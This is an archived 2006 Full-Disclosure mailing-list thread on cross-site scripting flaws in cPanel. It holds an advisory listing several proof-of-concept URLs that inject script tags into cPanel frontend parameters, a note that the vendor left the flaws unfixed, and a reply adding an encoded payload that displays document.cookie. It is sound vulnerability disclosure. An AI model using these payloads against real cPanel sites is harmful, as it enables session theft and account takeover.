lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Fri Feb  3 06:48:37 2006
From: sumit.siddharth at gmail.com (Sumit Siddharth)
Subject: Re: cPanel Multiple Cross Site Scripting
	Vulnerability

An addition to your POC :)
http://localhost:2095/webmailaging.cgi?numdays=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&ageaction=change
Thanks
Sumit

On 2/3/06, Sullo <csullo@...il.com> wrote:
> On 3/13/2004 I notified cPanel that they had major XSS issues in their
> backend... beyond what I was actually sending them or documenting, and they
> should fix them. They agreed.
>
> However, based on this, it doesn't look like they've done much in the two
> years since I posted:
>    http://www.cirt.net/advisories/cpanel_xss.shtml
>
>
> On 2/2/06, simo@...x.org <simo@...x.org> wrote:
> >
> > Title: cPanel Multiple Cross Site Scripting
> > Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
> > Affected scripts with proof of concept exploit:
> >
> >
> >
> http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email=
> > <script>alert('vul')</script>&domain=
> >
> >
> http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email=
> > <script>alert('vul')</script>&domain=xxx
> >
> >
> http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0
> > "><script>alert('vul')</script>
> >
> >
> http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target=
> > "><script>alert('vul')</script>
> >
> >
> http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx
> > "><script>alert('vul')</script>&target=xxx
> >
> >
> http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006
> > "><script>alert('vul')</script>&domain=xxx&target=xxx
> >
> >
> http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan
> > "><script>alert('vul')</script>&year=2006&domain=xxx&target=xxx
> >
>
> --
>
> http://www.cirt.net     |      http://www.osvdb.org/
>
>


--

Sumit Siddharth
Information Security Analyst
NII Consulting
Web: www.nii.co.in
------------------------------------
NII Security Advisories
http://www.nii.co.in/resources/advisories.html
------------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ